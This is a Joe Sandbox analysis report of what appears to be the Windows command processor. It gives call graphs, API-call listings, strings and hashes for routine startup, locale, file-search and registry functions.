25527 368e0 25528 368f1 25527->25528 25529 368fc 25527->25529 25533 35679 25528->25533 25531 35679 466 API calls 25529->25531 25532 368f6 25531->25532 25558 271a8 25533->25558 25535 35685 RegOpenKeyExW 25536 35780 25535->25536 25537 356bb 25535->25537 25536->25532 25538 1bc30 448 API calls 25537->25538 25539 356cd 25538->25539 25540 20060 5 API calls 25539->25540 25548 356da 25539->25548 25542 356ed 25540->25542 25543 1acb0 448 API calls 25542->25543 25546 356f4 25543->25546 25544 356e4 25610 35799 25544->25610 25546->25544 25546->25548 25551 35711 25546->25551 25559 357a8 25548->25559 25549 35716 25550 178e4 448 API calls 25549->25550 25550->25544 25551->25549 25552 20060 5 API calls 25551->25552 25553 35737 25552->25553 25554 1acb0 448 API calls 25553->25554 25555 3573e 25554->25555 25555->25544 25555->25549 25556 35759 25555->25556 25587 364db 25556->25587 25558->25535 25560 358af 25559->25560 25565 357d0 25559->25565 25561 1ab7f 2 API calls 25560->25561 25563 358b6 25561->25563 25562 357da RegEnumKeyExW 25562->25565 25567 35892 25562->25567 25564 1acb0 448 API calls 25563->25564 25566 358bd 25564->25566 25565->25562 25565->25567 25568 362b3 453 API calls 25565->25568 25572 35885 GetLastError 25565->25572 25576 19950 448 API calls 25565->25576 25577 1dc60 2 API calls 25565->25577 25566->25567 25570 201f5 wcsrchr 25566->25570 25569 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 25567->25569 25568->25565 25571 35946 25569->25571 25573 358cd 25570->25573 25571->25544 25574 178e4 448 API calls 25572->25574 25575 362b3 453 API calls 25573->25575 25574->25567 25578 358df 25575->25578 25576->25565 25577->25565 25579 35913 25578->25579 25583 35903 25578->25583 25580 178e4 448 API calls 25579->25580 25581 3590f 25580->25581 25582 1dc60 2 API calls 25581->25582 25584 35930 25582->25584 25585 19950 448 API calls 25583->25585 25586 1dc60 2 API calls 25584->25586 25585->25581 25586->25567 25588 364e7 25587->25588 25589 3658c RegDeleteKeyExW 25588->25589 25591 36502 RegCreateKeyExW 25588->25591 25590 3659f RegOpenKeyExW 25589->25590 25607 3656b 25589->25607 25593 365cc RegDeleteValueW 25590->25593 25594 365bc 25590->25594 25595 36573 25591->25595 25596 3651e RegSetValueExW RegCloseKey 25591->25596 25592 272ef ApiSetQueryApiSetPresence 25601 36601 25592->25601 25598 365e3 25593->25598 25599 365ec RegCloseKey 25593->25599 25602 178e4 448 API calls 25594->25602 25594->25607 25597 178e4 448 API calls 25595->25597 25596->25595 25608 3655d 25596->25608 25600 3657a 25597->25600 25604 178e4 448 API calls 25598->25604 25599->25607 25606 178e4 448 API calls 25600->25606 25601->25544 25602->25607 25605 365ea 25604->25605 25605->25599 25606->25607 25607->25592 25607->25601 25609 19950 448 API calls 25608->25609 25609->25607 25611 1dc60 2 API calls 25610->25611 25612 357a0 25611->25612 25613 1dc60 2 API calls 25612->25613 25614 35775 RegCloseKey 25613->25614 25614->25536

                                                                                                                                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00018572 Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 392COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 96 18572-185a6 call 18791 GetLocaleInfoW 99 2b2f9-2b300 96->99 100 185ac-185c4 GetLocaleInfoW 96->100 101 2b302-2b30a 99->101 102 18602-1861c GetLocaleInfoW 100->102 103 185c6-185cb 100->103 104 2b320-2b322 101->104 105 2b30c-2b313 101->105 107 1863e-1865e GetLocaleInfoW 102->107 108 1861e-18628 102->108 106 185d1-185d7 103->106 112 2b327-2b329 104->112 113 2b324 104->113 105->104 111 2b315-2b31e 105->111 114 18787-18789 106->114 115 185dd-185e0 106->115 109 18660-18667 107->109 110 18673-18685 GetLocaleInfoW 107->110 116 2b331-2b334 108->116 117 1862e-18634 108->117 109->110 118 18669 109->118 119 2b371-2b378 110->119 120 1868b-186a0 GetLocaleInfoW 110->120 111->101 111->104 112->116 113->112 114->99 121 185e2-185ea 115->121 122 185fb-185fd 115->122 123 2b336-2b339 116->123 124 2b358-2b36c 116->124 117->107 118->110 129 2b37a-2b382 119->129 125 186a6-186b8 GetLocaleInfoW 120->125 126 2b3a9-2b3b0 120->126 121->114 127 185f0-185f9 121->127 122->102 123->107 128 2b33f-2b353 123->128 124->107 132 2b3e1-2b3e8 125->132 133 186be-186d0 GetLocaleInfoW 125->133 134 2b3b2-2b3ba 126->134 127->106 127->122 128->107 130 2b384-2b38b 129->130 131 2b398-2b39a 129->131 130->131 135 2b38d-2b396 130->135 136 2b39f-2b3a1 131->136 137 2b39c 131->137 142 2b3ea-2b3f2 132->142 138 186d6-186e8 GetLocaleInfoW 133->138 139 2b419-2b420 133->139 140 2b3d0-2b3d2 134->140 141 2b3bc-2b3c3 134->141 135->129 135->131 136->126 137->136 146 2b451-2b458 138->146 147 186ee-18700 GetLocaleInfoW 138->147 145 2b422-2b42a 139->145 149 2b3d7-2b3d9 140->149 150 2b3d4 140->150 141->140 148 2b3c5-2b3ce 141->148 143 2b3f4-2b3fb 142->143 144 2b408-2b40a 142->144 143->144 151 2b3fd-2b406 143->151 152 2b40f-2b411 144->152 153 2b40c 144->153 154 2b440-2b442 145->154 155 2b42c-2b433 145->155 158 2b45a-2b462 146->158 156 18706-18718 GetLocaleInfoW 147->156 157 2b489-2b490 147->157 148->134 148->140 149->132 150->149 151->142 151->144 152->139 153->152 165 2b447-2b449 154->165 166 2b444 154->166 155->154 162 2b435-2b43e 155->162 163 2b4c1-2b4c8 156->163 164 1871e-18730 GetLocaleInfoW 156->164 161 2b492-2b49a 157->161 159 2b464-2b46b 158->159 160 2b478-2b47a 158->160 159->160 167 2b46d-2b476 159->167 168 2b47f-2b481 160->168 169 2b47c 160->169 170 2b4b0-2b4b2 161->170 171 2b49c-2b4a3 161->171 162->145 162->154 174 2b4ca-2b4d2 163->174 172 18736-1874b GetLocaleInfoW 164->172 173 2b4f9-2b4fe 164->173 165->146 166->165 167->158 167->160 168->157 169->168 179 2b4b7-2b4b9 170->179 180 2b4b4 170->180 171->170 178 2b4a5-2b4ae 171->178 181 18751-18763 GetLocaleInfoW 172->181 182 2b52f-2b536 172->182 177 2b500-2b508 173->177 175 2b4d4-2b4db 174->175 176 2b4e8-2b4ea 174->176 175->176 183 2b4dd-2b4e6 175->183 184 2b4ef-2b4f1 176->184 185 2b4ec 176->185 186 2b50a-2b511 177->186 187 2b51e-2b520 177->187 178->161 178->170 179->163 180->179 188 2b567-2b56c 181->188 189 18769-18786 setlocale call 26b30 181->189 190 2b538-2b540 182->190 183->174 183->176 184->173 185->184 186->187 194 2b513-2b51c 186->194 195 2b522 187->195 196 2b525-2b527 187->196 193 2b56e-2b576 188->193 191 2b542-2b549 190->191 192 2b556-2b558 190->192 191->192 198 2b54b-2b554 191->198 199 2b55a 192->199 200 2b55d-2b55f 192->200 201 2b578-2b57f 193->201 202 2b58c-2b58e 193->202 194->177 194->187 195->196 196->182 198->190 198->192 199->200 200->188 201->202 204 2b581-2b58a 201->204 205 2b593-2b595 202->205 206 2b590 202->206 204->193 204->202 206->205
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00016906,0000001F,?,00000080), ref: 00018791
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNELBASE(00000000,0000001E,0004C9E0,00000008), ref: 0001859E
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 000185BC
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00018614
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00018653
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,0004C9D0,00000008), ref: 0001867D
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,0004C970,00000020), ref: 00018698
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,0004C930,00000020), ref: 000186B0
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,0004C8F0,00000020), ref: 000186C8
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,0004C8B0,00000020), ref: 000186E0
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,0004C870,00000020), ref: 000186F8
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,0004C830,00000020), ref: 00018710
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,0004C7F0,00000020), ref: 00018728
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,0004C9C0,00000008), ref: 00018743
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,0004C9B0,00000008), ref: 0001875B
                                                                                                                                                                                                                                                                                                                                                                                                                          • setlocale.MSVCRT ref: 00018770
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1351325837-2236139042
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3846ac712209e5cf350f9fd01572f9728111bbb8c988323823da3d88505067d6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b293c6a42e162ffac73954808c4aac93d82f32d05cf0b118b3367436f901cd32
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3846ac712209e5cf350f9fd01572f9728111bbb8c988323823da3d88505067d6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFC1D37170022296EB709F35ED48BBB37ECAF51754F244229E946DA185EF78CA81C360
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00020207 Relevance: 9.2, APIs: 6, Instructions: 154fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 832 20207-20236 833 20239-20242 832->833 833->833 834 20244-2024a 833->834 835 20250-20255 834->835 836 2037d 834->836 837 20259-20263 835->837 840 2e739-2e750 _wcsicmp 836->840 838 20265-20268 837->838 839 2028c-202a9 FindFirstFileW 837->839 838->839 841 2026a-20270 838->841 844 2e798-2e79b 839->844 845 202af-202bf FindClose 839->845 842 2e756-2e75d 840->842 843 202c5-202cf 840->843 841->837 846 20272-20289 call 26b30 841->846 848 202d2-202dd 843->848 845->843 847 2034d-20351 845->847 847->842 851 20357-20372 _wcsnicmp 847->851 848->848 850 202df-202f7 848->850 850->836 854 202fd-202ff 850->854 851->843 852 20378 851->852 852->840 855 2e762-2e764 854->855 856 20305-20348 memcpy call 1f3a0 854->856 857 2e767-2e772 855->857 856->841 857->857 859 2e774-2e791 memmove 857->859 859->844
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,00000000,00000000,00000000), ref: 00020297
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 000202B0
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?), ref: 00020311
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00020367
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0002E746
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 242869866-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 171a18aad7d75bc888f47a4fd79dc22f927a50912ef0745b669d15953ea4f972
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 75715ce3754400f2662a5c3ae274e3f2c605ab3813428a1cf37929237525602a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 171a18aad7d75bc888f47a4fd79dc22f927a50912ef0745b669d15953ea4f972
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5851A3756083618BC724DF68EC485AFB7E9EFC8310F15461EE889C3291E731D949CB96
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000187CA Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 270memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 0 187ca-18870 InitializeCriticalSection EnterCriticalSection LeaveCriticalSection SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 1e310 call 1a9d4 call 18b96 call 18273 GetCommandLineW 9 18873-1887c 0->9 9->9 10 1887e-1888a 9->10 11 18890-1889f call 21a05 10->11 12 18b37-18b38 10->12 18 188a5-188db GetCommandLineW call 1f3a0 call 1e3f0 11->18 19 18b2f-18b35 11->19 14 18b3d-18b43 call 178e4 12->14 20 18b44-18b4c call 27d18 14->20 18->19 27 188e1-188e9 18->27 19->14 28 188f0-18903 call 18e9e call 200e9 27->28 29 188eb 27->29 34 18906-1890f 28->34 29->28 34->34 35 18911-18930 call 1a24c 34->35 38 18932 35->38 39 18934-1893d 35->39 38->39 40 189ab-189e1 GetConsoleOutputCP GetCPInfo call 18572 GetProcessHeap HeapAlloc 39->40 41 1893f-18943 39->41 47 189e3-189f1 GetConsoleTitleW 40->47 48 189fd-18a03 40->48 43 18945 41->43 44 18947-18951 41->44 43->44 44->40 46 18953-1895a 44->46 46->40 49 1895c-1895e 46->49 47->48 50 189f3-189fa 47->50 51 18a51-18a57 48->51 52 18a05-18a0f call 19a11 48->52 53 18960 49->53 54 18962-18979 call 178e4 49->54 50->48 55 18a59-18a8b call 370d6 call 14d08 call 163bd call 19950 51->55 56 18abb-18b08 GetModuleHandleW GetProcAddress * 3 51->56 52->51 67 18a11-18a1b 52->67 53->54 68 18980-1898f GetWindowsDirectoryW 54->68 69 1897b 54->69 87 18aa7-18ab0 call 178e4 55->87 88 18a8d-18aa5 call 19950 * 2 55->88 60 18b14-18b16 56->60 61 18b0a-18b0d 56->61 66 18b17-18b28 free call 26b30 60->66 61->60 65 18b0f-18b12 61->65 65->60 65->66 79 18b2d-18b2e 66->79 73 18a1d-18a32 GetStdHandle GetConsoleScreenBufferInfo 67->73 74 18a4c call 38496 67->74 68->20 70 18995-1899d 68->70 69->68 75 189a4-189a6 call 18bc7 70->75 76 1899f 70->76 80 18a40-18a4a 73->80 81 18a34-18a3e 73->81 74->51 75->40 76->75 80->51 80->74 81->51 94 18ab1-18ab5 GlobalFree 87->94 88->94 94->56
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0004CA04), ref: 000187EE
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 000187FA
                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 0001880E
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00037460,00000001), ref: 0001881B
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00018828
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(00000000), ref: 00018830
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001883C
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(00000000), ref: 00018844
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E310: _get_osfhandle.MSVCRT ref: 0001E318
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E310: SetConsoleMode.KERNELBASE(00000000), ref: 0001E322
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E310: _get_osfhandle.MSVCRT ref: 0001E32F
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E310: GetConsoleMode.KERNELBASE(00000000), ref: 0001E339
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E310: _get_osfhandle.MSVCRT ref: 0001E35E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E310: GetConsoleMode.KERNELBASE(00000000), ref: 0001E368
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E310: _get_osfhandle.MSVCRT ref: 0001E390
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E310: SetConsoleMode.KERNELBASE(00000000), ref: 0001E39A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,0001A9C5), ref: 0001A9D8
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 0001A9F3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A9D4: RtlAllocateHeap.NTDLL(00000000), ref: 0001A9FA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 0001AA09
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 0001AA12
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018B96: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,0001885E), ref: 00018B9D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018B96: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001885E), ref: 00018BA4
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018273: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 000182D3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018273: RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00018313
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018273: RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 0001834D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018273: RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 0001839D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018273: RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 000183D7
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 0001886A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 000188A5
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000000,-00000105,00000000), ref: 00018987
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNELBASE(?,?,00000000,-00000105,00000000), ref: 000189AB
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0004C9F0), ref: 000189BC
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018572: GetLocaleInfoW.KERNELBASE(00000000,0000001E,0004C9E0,00000008), ref: 0001859E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 000185BC
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00018614
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00018653
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,0004C9D0,00000008), ref: 0001867D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,0004C970,00000020), ref: 00018698
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,0004C930,00000020), ref: 000186B0
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 000189CD
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 000189D4
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.KERNELBASE(00000000,00000104), ref: 000189E9
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?), ref: 00018A23
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00018A2A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00018AB5
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 00018AC0
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 00018AD1
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 00018AE7
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 00018AF8
                                                                                                                                                                                                                                                                                                                                                                                                                          • free.MSVCRT(?), ref: 00018B18
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Info$Locale$HeapMode_get_osfhandle$QueryValue$AddressCriticalProcProcessSection$AllocCommandEnvironmentFreeHandleLineStrings$AllocateBufferCtrlDirectoryEnterGlobalHandlerInitializeLeaveModuleOpenOutputScreenTitleWindowsfreememcpy
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3313898297-3021193919
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0710b4d5de879887a8bc1b9493c0d7b4d3f7147b0695709630894b2b3dfd2d43
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b1d5e8605da0560b314baa7bd58955a6a1daef1c24971ded29c33f482cca9598
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0710b4d5de879887a8bc1b9493c0d7b4d3f7147b0695709630894b2b3dfd2d43
